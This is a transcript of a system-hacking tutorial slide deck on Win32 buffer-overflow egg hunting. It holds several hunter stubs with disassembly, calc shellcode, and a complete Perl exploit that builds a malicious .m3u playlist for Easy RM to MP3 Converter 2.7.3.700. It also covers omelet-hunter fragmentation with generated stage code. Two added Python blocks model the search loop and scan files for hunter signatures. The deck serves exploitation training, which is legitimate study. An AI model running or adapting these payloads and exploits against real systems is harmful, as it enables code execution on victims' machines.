system hacking tutorial #3 - buffer overflow - egg hunting
TRANSCRIPT
System Hacking & Reverse Engineering
documented by h2spice [email protected]
[ Buffer Overflow - Egg Hunting ]
Who am I
Sanghwan Ahn (h2spice)
Works for LINE Corp.
Carries out vulnerability research (exploitation, hunting, analysis)
Curriculum introduction
System hacking / reversing
  Vulnerability fundamentals
    Buffer Overflow
    Stack Overflow
    Heap Overflow
    Format String Bug
    Use After Free
  Exploitation (Win32 / *NIX / ARM)
    Overwriting RET
    Overwriting SEH
    Egg Hunting
    RTL
    ROP
    Heap Spraying
    Overwriting .dtors
    Overwriting GOT
  Vulnerability / malware analysis
    Malware analysis
    Bug hunting (x86, ARM)
    Vulnerability analysis (software on x86, mobile)
    Source code analysis
    Fuzzing
    CVE-XXXX-XXXX
    Exploit-DB, Inj3ct0r, 1337day
  Reverse engineering
    iOS
    Android
Contents
Track3 - Exploitation
  Introduction
  Track3-1 Win32
    Overwrite RET
    Overwrite SEH
    Egg-Hunting
    ROP
    Heap Spray
  Track3-2 *NIX
    Overwrite RET
    RTL
    Overwrite .dtors
    Overwrite GOT
  Track3-3 ARM
    Overwrite RET
    RTL
    ROP
Track3. Exploitation
  Introduction
  Track3-1 Win32
    Overwrite RET
    Overwrite SEH
    Egg-Hunting
    ROP (Return Oriented Programming)
    Heap Spray
  Track3-2 *NIX
    Overwrite RET
    Ret-to-LibC
    Overwrite .dtors
    Overwrite GOT
  Track3-3 ARM
    Overwrite RET
    Ret-to-LibC
    ROP (Return Oriented Programming)
What is Egg-Hunting?
- Uses a technique that searches the process's VAS (Virtual Address Space)
- Useful when the attack vector provides only a very small buffer (assuming the attacker can already control the program's flow)
- Egg hunting is basically made up of three pieces of code:
  - Egg hunter code
  - Marker or tag
  - Arbitrary shellcode
How to work Egg-Hunter Code?
Egg-Hunter Code:
\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t) \x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7
Marker / Tag + Shell Code (Calc):
\x77\x30\x30\x74\x77\x30\x30\x74 (w00tw00t), followed by the shellcode (cut off on the slide):
\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49 \x50\x4c\x59\x4e\x4c\x4c\x44\x49
1. Search memory & find the marker
2. Store the marker's address & jump there
3. Execute the shellcode
Important in order for Egg-Hunting to work
- You must be able to control the program's flow from user input: you must be able to jump to (jmp, call, push/ret) & execute some shellcode
- The egg-hunter code must be located in a predictable memory region: egg-hunter code must be available in a predictable location (so you can reliably jump to it & execute it)
- The marker/tag must be a unique identifier placed in front of the final shellcode: you must prepend the final shellcode with a unique string/marker/tag
- Test the memory-search techniques (IsBadReadPtr, NtDisplayString, NtAccessCheckAndAuditAlarm) to find the one that suits a particular system: you'll have to test which technique to search memory works for a particular exploit
- The buffer must be at least large enough for the egg-hunter code to be inserted: the amount of available buffer space can be relatively small, because it will only contain the so-called "egg-hunter"
- The final shellcode can sit anywhere in memory (stack/heap/etc.): the final shellcode must be available somewhere in memory
Egg-Hunter using SEH injection
Egg-hunter code using SEH injection:

```perl
my $egghunter = "\xeb\x21\x59\xb8"."w00t".
                "\x51\x6a\xff\x33\xdb\x64\x89\x23".
                "\x6a\x02\x59\x8b\xfb\xf3\xaf\x75".
                "\x07\xff\xe7\x66\x81\xcb\xff\x0f".
                "\x43\xeb\xed\xe8\xda\xff\xff\xff".
                "\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8".
                "\x83\x04\x08\x06\x58\x83\xc4\x10".
                "\x50\x33\xc0\xc3";
```

```asm
EB21        jmp short 0x23
59          pop ecx
B890509050  mov eax,0x50905090      ; this is the Marker   (1) move marker to EAX
51          push ecx
6AFF        push byte -0x1
33DB        xor ebx,ebx
648923      mov [fs:ebx],esp        ; install the exception handler (SEH injection)
6A02        push byte +0x2
59          pop ecx
8BFB        mov edi,ebx
F3AF        repe scasd              ; (2) repeat until the marker is found
7507        jnz 0x20
FFE7        jmp edi
6681CBFF0F  or bx,0xfff
43          inc ebx
EBED        jmp short 0x10
E8DAFFFFFF  call 0x2
6A0C        push byte +0xc
59          pop ecx
8B040C      mov eax,[esp+ecx]
B1B8        mov cl,0xb8
83040806    add dword [eax+ecx],byte +0x6
58          pop eax
83C410      add esp,byte +0x10
50          push eax
33C0        xor eax,eax
C3          ret
```

The listing shows the marker as 0x50905090; the Perl string above substitutes "w00t".
Egg hunter size = 60 bytes, Egg size = 8 bytes
Egg-Hunter using IsBadReadPtr
Egg-hunter code using IsBadReadPtr:

```perl
my $egghunter = "\x33\xdb\x66\x81".
                "\xcb\xff\x0f\x43\x6a\x08\x53\xb8".
                "\x0d\x5b\xe7\x77\xff\xd0\x85\xc0".
                "\x75\xec\xb8"."w00t".
                "\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4".
                "\xff\xe7";
```

```asm
33DB        xor ebx,ebx
6681CBFF0F  or bx,0xfff
43          inc ebx
6A08        push byte +0x8
53          push ebx
B80D5BE777  mov eax,0x77e75b0d      ; hard-coded address of IsBadReadPtr
FFD0        call eax
85C0        test eax,eax
75EC        jnz 0x2
B890509050  mov eax,0x50905090      ; this is the Marker   (1) move marker to EAX
8BFB        mov edi,ebx
AF          scasd                   ; (2) repeat until the marker is found
75E7        jnz 0x7
AF          scasd
75E4        jnz 0x7
FFE7        jmp edi
```

Egg hunter size = 37 bytes, Egg size = 8 bytes
Egg-Hunter using NtDisplayString
Egg-hunter code using NtDisplayString:

```perl
my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A".
                "\x43\x58\xCD\x2E\x3C\x05\x5A\x74".
                "\xEF\xB8"."w00t".
                "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7".
                "\xFF\xE7";
```

```asm
6681CAFF0F  or dx,0x0fff
42          inc edx
52          push edx
6A43        push byte +0x43
58          pop eax
CD2E        int 0x2e
3C05        cmp al,0x5
5A          pop edx
74EF        jz 0x0
B890509050  mov eax,0x50905090      ; this is the Marker   (1) move marker to EAX
8BFA        mov edi,edx
AF          scasd                   ; (2) repeat until the marker is found
75EA        jnz 0x5
AF          scasd
75E7        jnz 0x5
FFE7        jmp edi
```

Egg hunter size = 32 bytes, Egg size = 8 bytes
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
Egg-hunter code using NtAccessCheckAndAuditAlarm:

```perl
my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A".
                "\x02\x58\xCD\x2E\x3C\x05\x5A\x74".
                "\xEF\xB8"."w00t".
                "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7".
                "\xFF\xE7";
```

```asm
6681CAFF0F  or dx,0x0fff
42          inc edx
52          push edx
6A02        push byte +0x02
58          pop eax
CD2E        int 0x2e
3C05        cmp al,0x5
5A          pop edx
74EF        jz 0x0
B890509050  mov eax,0x50905090      ; this is the Marker   (1) move marker to EAX
8BFA        mov edi,edx
AF          scasd                   ; (2) repeat until the marker is found
75EA        jnz 0x5
AF          scasd
75E7        jnz 0x5
FFE7        jmp edi
```

Egg hunter size = 32 bytes, Egg size = 8 bytes
It has the same shape as the egg hunter that uses NtDisplayString, but it is a different kind of egg hunter, with the form shown above. Instead of NtDisplayString, this method uses NtAccessCheckAndAuditAlarm (offset 0x02 in the KiServiceTable) to avoid the access violations the egg hunter could raise while it reads through memory.
For more details on NtAccessCheck, see the links below:
- http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf
- http://xosmos.net/txt/nativapi.html
Egg-Hunter using NtAccessCheck(AndAuditAlarm): step by step
1. Set the address at which the memory search starts (or dx,0x0fff)
2. Increase the address for the next memory search (inc edx)
3. Save the address currently being pointed to on the stack (push edx)
4. Put 0x2 into EAX (the syscall number for NtAccessCheckAndAuditAlarm) and invoke the syscall (push byte +0x02; pop eax; int 0x2e)
5. Check whether an access violation (ACCESS_VIOLATION) occurred (cmp al,0x5)
6. Restore the EDX value (pop edx)
7. If an access violation occurred, go back to the start (0x12cd6c) (jz)
8. Load the marker into EAX; store the address being searched (EDX) in EDI; compare the marker (EAX) with the memory at the search address (EDI) (mov eax,marker; mov edi,edx; scasd)
9. If the marker is not found, go back to the start (0x12cd6c) (jnz)
10. If the marker is found, jump to that point (jmp edi)
Final Shellcode
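The search loop above, replayed in Python as an added example (not code from the slides) over a small constructed address space: it follows the disassembly listing step for step, assumes that the syscall's argument probe covers the 8 bytes the two scasd instructions read, and shows why unmapped pages are stepped over a page at a time and why a single copy of the tag is not taken for the egg.

```python
"""Model of the NtAccessCheckAndAuditAlarm egg hunter's search loop.

Added example; not the slides' own code. Replays the ten numbered steps
(align to page, probe, compare the tag twice, jump) over a toy 32-bit
address space so the logic can be inspected without a debugger.
"""

PAGE_SIZE = 0x1000
ADDR_MASK = 0xFFFFFFFF
TAG = b"w00t"                 # the 4-byte marker the stub loads into EAX
PROBE_BYTES = 8               # assumption: the kernel's argument probe covers
                              # at least the 8 bytes the two scasd will read


class ToyAddressSpace:
    """Sparse 32-bit address space: only explicitly mapped pages are readable.

    An unmapped address stands in for the STATUS_ACCESS_VIOLATION (low byte
    0x05) that the syscall returns when the hunter hands it a bad pointer.
    """

    def __init__(self):
        self._pages = {}

    def map_bytes(self, addr, data):
        """Write data at addr, mapping (zero-filled) every page it touches."""
        for i, byte in enumerate(data):
            a = (addr + i) & ADDR_MASK
            page = self._pages.setdefault(a & ~(PAGE_SIZE - 1),
                                          bytearray(PAGE_SIZE))
            page[a & (PAGE_SIZE - 1)] = byte

    def _byte(self, addr):
        addr &= ADDR_MASK
        return self._pages[addr & ~(PAGE_SIZE - 1)][addr & (PAGE_SIZE - 1)]

    def readable(self, addr, length=1):
        """True if every byte of [addr, addr+length) lies in a mapped page."""
        return all((((addr + i) & ADDR_MASK) & ~(PAGE_SIZE - 1)) in self._pages
                   for i in range(length))

    def read_dword(self, addr):
        """The 4 bytes at addr (the caller has already probed them)."""
        return bytes(self._byte(addr + i) for i in range(4))


def hunt(space, start, tag=TAG, max_probes=1 << 22):
    """Replay the hunter's loop starting with EDX = start.

    Returns the address `jmp edi` would land on (the byte after the doubled
    tag), or None if max_probes syscalls went by without a hit. The real stub
    never gives up: it keeps sweeping and wraps around at 0xFFFFFFFF.
    A fault goes back to `or dx,0x0fff` (skip the rest of the page); a tag
    mismatch goes back to `inc edx` (try the next byte).
    """
    edx = start & ADDR_MASK
    skip_page = True                      # first pass enters at or dx,0x0fff
    for _ in range(max_probes):
        if skip_page:                     # (1) last byte of the current page
            edx |= PAGE_SIZE - 1
        edx = (edx + 1) & ADDR_MASK       # (2) next page, or next byte
        # (3)-(6): push edx; eax = 2; int 0x2e; cmp al,5; pop edx
        if not space.readable(edx, PROBE_BYTES):
            skip_page = True              # (7) access violation: next page
            continue
        skip_page = False
        edi = edx                         # (8) mov eax,tag; mov edi,edx; scasd
        if space.read_dword(edi) != tag:
            continue                      # (9) no marker here: inc edx
        edi = (edi + 4) & ADDR_MASK
        if space.read_dword(edi) != tag:  # second scasd: the tag must appear twice
            continue                      # (9) a lone copy of the tag is skipped
        return (edi + 4) & ADDR_MASK      # (10) jmp edi: first shellcode byte
    return None


def build_demo_space():
    """Constructed layout: a lone copy of the tag (like the one inside the
    hunter stub itself) in one page, the real egg in a higher page, and
    unmapped pages in between that the hunter must skip without faulting."""
    space = ToyAddressSpace()
    space.map_bytes(0x00200010, b"a lone w00t is not an egg")
    egg = b"\x90" * 25 + TAG + TAG + b"\xCC" * 16   # int3 bytes stand in for shellcode
    space.map_bytes(0x00250800, egg)
    return space


def demo():
    """Hunt from EDX = 0x00130000 and report where the stub would jump."""
    return hunt(build_demo_space(), start=0x00130000)
```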
Exercise Time :D
Target Info
- Win32
- Easy RM to MP3 Converter v.2.7.3.700
- Download link: http://outofcontrol.co.kr/vulnApp/EasyRM.zip
Vulnerability Type
- Buffer Overflow (Stack Based) by parsing a playlist
Tip
- Generate a pattern using the mona plugin (!mona pattern_create 30000)
- NOP sleds (0x90 * N)
- Shellcode (windows/exec calc.exe):

```perl
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
```
Exploit Info
- .m3u playlist file format
- Length of junk data is 26039
- Gadget is 0x7608fcfe (jmp esp from MSRMCcodec02.dll)
Exploit Code (EggHuntingExploit.pl)

```perl
my $file = "EggHuntingExploit.m3u";
my $junk = "A" x 26039;
my $eip  = pack('V', 0x7608fcfe);   # jmp esp from MSRMCcodec02.dll
my $padding = "\x90" x 25;
my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
                "\x77\x30\x30\x74".   # this is the marker/tag: w00t
                "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = $padding .
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
# write the playlist in binary mode so the bytes reach the file unchanged
open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);
print $FILE $junk.$eip.$padding.$egghunter."w00tw00t".$shellcode;
close($FILE);
print "m3u File Created successfully\n";
```
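A defender-side counterpart to the playlist above, added here as an example (not code from the slides): it scans a constructed .m3u payload for the three hunter stubs shown in the listings, recovers the tag embedded in the stub, confirms whether the doubled tag (the egg) is present elsewhere in the file, and flags playlist entries far too long to be file paths. The sample data, the size limit and the int3 bytes standing in for shellcode are constructed assumptions.

```python
"""Signature check for the egg-hunter stubs shown in these slides.

Added example; not the slides' own code. Intended for triage of playlist
files like the exercise's .m3u: find a stub, pull its tag, locate the egg.
"""
import re

# Byte patterns of the three stubs in the disassembly listings. The tag
# (mov eax,imm32) is captured; the syscall-based stub also captures the
# syscall number byte (0x43 NtDisplayString, 0x02 NtAccessCheckAndAuditAlarm).
SIGNATURES = {
    "syscall-based (NtDisplayString / NtAccessCheckAndAuditAlarm)": re.compile(
        rb"\x66\x81\xCA\xFF\x0F\x42\x52\x6A(?P<sys>.)\x58\xCD\x2E\x3C\x05\x5A\x74\xEF"
        rb"\xB8(?P<tag>.{4})\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7", re.DOTALL),
    "IsBadReadPtr": re.compile(
        rb"\x33\xDB\x66\x81\xCB\xFF\x0F\x43\x6A\x08\x53\xB8.{4}\xFF\xD0\x85\xC0\x75\xEC"
        rb"\xB8(?P<tag>.{4})\x8B\xFB\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7", re.DOTALL),
    "SEH injection": re.compile(
        rb"\xEB\x21\x59\xB8(?P<tag>.{4})\x51\x6A\xFF\x33\xDB\x64\x89\x23", re.DOTALL),
}


def scan(data):
    """Return one finding per hunter stub in data: its offset, variant, tag,
    syscall number (None for the non-syscall stubs) and the offsets of every
    doubled tag, i.e. the egg the stub would jump to."""
    findings = []
    for variant, pattern in SIGNATURES.items():
        for m in pattern.finditer(data):
            tag = m.group("tag")
            sys_byte = m.groupdict().get("sys")
            findings.append({
                "offset": m.start(),
                "variant": variant,
                "tag": tag,
                "syscall": sys_byte[0] if sys_byte else None,
                "egg_offsets": [e.start() for e in re.finditer(re.escape(tag + tag), data)],
            })
    return findings


def oversized_entries(data, limit=1024):
    """Playlist entries are file paths, so a line longer than limit bytes is
    worth a look even when no known stub matches (the exercise's file carries
    tens of KB of filler in one line). Returns (line_number, length) pairs."""
    return [(n, len(line))
            for n, line in enumerate(data.split(b"\n"), 1) if len(line) > limit]


def build_sample():
    """Constructed .m3u content for the checks above: filler, a short NOP
    sled, the NtAccessCheckAndAuditAlarm stub from the slides, the doubled
    tag and int3 bytes standing in for shellcode. Not a working payload."""
    stub = (b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
            + b"w00t" + b"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
    return (b"#EXTM3U\n" + b"A" * 4000 + b"\x90" * 8 + stub
            + b"w00tw00t" + b"\xCC" * 16 + b"\n")
```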
![Page 38: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/38.jpg)
What is the Omelet Egg Hunter? A shellcode fragmentation technique
Introduced by Skylined (Berend-Jan Wever): http://code.google.com/p/w32-seh-omelet-shellcode/
Useful when the attack vector provides only a very small buffer, and all the attacker controls is several small, scattered pieces of memory, none of them large enough for the whole payload
The basic idea is the same as a regular egg hunter, but with the following differences:
The final shellcode is split into several pieces (several eggs)
The final shellcode is reassembled before it is executed (a fragment is not executed as soon as it is found)
It is larger than a regular egg hunter (about 90 bytes; the one generated later in this deck is 82 bytes, against 32 bytes for the hunter used in the exercise above)
![Page 39: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/39.jpg)
How does the Omelet Egg Hunter work?
How the original shellcode is fragmented (layout of each egg):
Length of the egg (the payload length byte; with 127-byte eggs it is 0x7A = 122, the egg size minus the 5-byte header)
Index number (stored as 0xFF minus the index, so egg 0 carries 0xFF, egg 1 carries 0xFE, and so on)
3-byte marker
Fragmented shellcode (1/n, 2/n, 3/n … n/n)
The omelet egg hunter code:
Searches through memory
Looks for all the eggs (it does not stop at the first one it finds)
Assembles the fragments into the final shellcode (reproduces the original shellcode at the bottom of the stack; each fragment is written at index × length from the stack bottom, so the order in which the eggs are found does not matter)
Jumps to the reassembled shellcode and executes it
![Page 40: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/40.jpg)
Worked example on the slides: the first 96 bytes of the calc shellcode used later in this deck, split into three fragments of 32 bytes. Each egg is its header (Length(32), Index(n), Marker) followed by the 32 payload bytes:

Fragmented Shellcode 1/3  Length(32) Index(01) Marker
\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x43\x43
\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50

Fragmented Shellcode 2/3  Length(32) Index(02) Marker
\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41
\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43

Fragmented Shellcode 3/3  Length(32) Index(03) Marker
\x4a\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c
\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a

The omelet egg hunter code (search memory, find marker, assemble the fragmented shellcode, jump to the final shellcode and execute it) runs the same three-step loop once per egg, copying each fragment into place at the bottom of the stack, and only jumps to the result once every fragment is in place:

1. Search through memory
2. Find marker
3. Check length/index; fragment 1/3 is reproduced at the bottom of the stack (Original Shellcode so far: 32 bytes)
4. Search through memory
5. Find marker
6. Check length/index; fragment 2/3 is placed after it (Original Shellcode so far: 64 bytes)
7. Search through memory
8. Find marker
9. Check length/index; fragment 3/3 is placed after it (Original Shellcode so far: 96 bytes)
10. Jump to the reproduced shellcode and execute it

Original Shellcode (reproduced at the bottom of the stack after step 9):
\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x43\x43
\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50
\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41
\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43
\x4a\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c
\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a
![Page 54: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/54.jpg)
How to make an Omelet Egg Hunter
![Page 55: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/55.jpg)
Download the omelet code package (the script that fragments the shellcode and generates the omelet code):
W32-seh-omelet-shellcode (by Skylined) https://code.google.com/p/w32-seh-omelet-shellcode/downloads/list
![Page 56: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/56.jpg)
Create the shellcode file (makingShellCodeForOmelet.pl). The tool reads the raw shellcode from a binary file, so the 303-byte calc shellcode is written out byte for byte:

```perl
use strict;
use warnings;

my $scfile = "shellcode.bin";
# calc shellcode, 303 bytes
my $shellcode =
    "\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
    "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
    "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
    "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
    "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
    "\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
    "\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
    "\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
    "\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
    "\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
    "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
    "\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
    "\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
    "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
    "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
    "\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
    "\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
    "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
    "\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
    "\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
    "\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
    "\x31\x42\x4c\x42\x43\x45\x50\x41\x41";

open(my $FILE, '>', $scfile) or die "Cannot open $scfile: $!";
binmode($FILE);   # raw bytes: no newline translation on Windows
print $FILE $shellcode;
close($FILE);
print "Wrote " . length($shellcode) . " bytes to file " . $scfile . "\n";
```
![Page 57: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/57.jpg)
Convert the shellcode into eggs. An egg is at most 127 bytes (the legal egg size is 6 to 127; 5 of those bytes are the header, which leaves up to 122 bytes of shellcode per egg), and the marker used here is 0xBADA55. Running the tool without arguments prints its syntax:

```text
C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py
Syntax: w32_SEH_omelet.py "omelet bin file" "shellcode bin file" "output txt file" [egg size] [marker bytes]
Where:
  omelet bin file    = The omelet shellcode stage binary code followed by three bytes of the offsets of the "marker bytes", "max index" and "egg size" variables in the code.
  shellcode bin file = The shellcode binary code you want to have stored in the eggs and reconstructed by the omelet shellcode stage code.
  output txt file    = The file you want the omelet egg-hunt code and the eggs to be written to (in text format).
  egg size           = The size of each egg (legal values: 6-127, default: 127)
  marker bytes       = The value you want to use as a marker to distinguish the eggs from other data in user-land address space (legal values: 0-0xFFFFFF, default value: 0x280876)
```

The 303-byte shellcode.bin from the previous step is packed into 127-byte eggs with marker 0xBADA55:

```text
C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py w32_SEH_omelet.bin shellcode.bin calceggs.txt 127 0xBADA55
```
![Page 58: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/58.jpg)
The generated calceggs.txt: the 82-byte omelet stage and the three eggs. Each egg starts with the payload length (0x7A = 122), the index byte (0xFF, 0xFE, 0xFD for eggs 0, 1 and 2) and the marker bytes 0x55 0xDA 0xBA (0xBADA55 little-endian), followed by its 122-byte fragment; the last egg is padded to size with 0x40.

```text
// This is the binary code that needs to be executed to find the eggs,
// recombine the original shellcode and execute it. It is 82 bytes:
omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x03\x97\xEB\xDB\x31\xC0\x64\xFF\x50\x08";

// These are the eggs that need to be injected into the target process
// for the omelet shellcode to be able to recreate the original shellcode
// (you can insert them as many times as you want, as long as each one is
// inserted at least once). They are 127 bytes each:
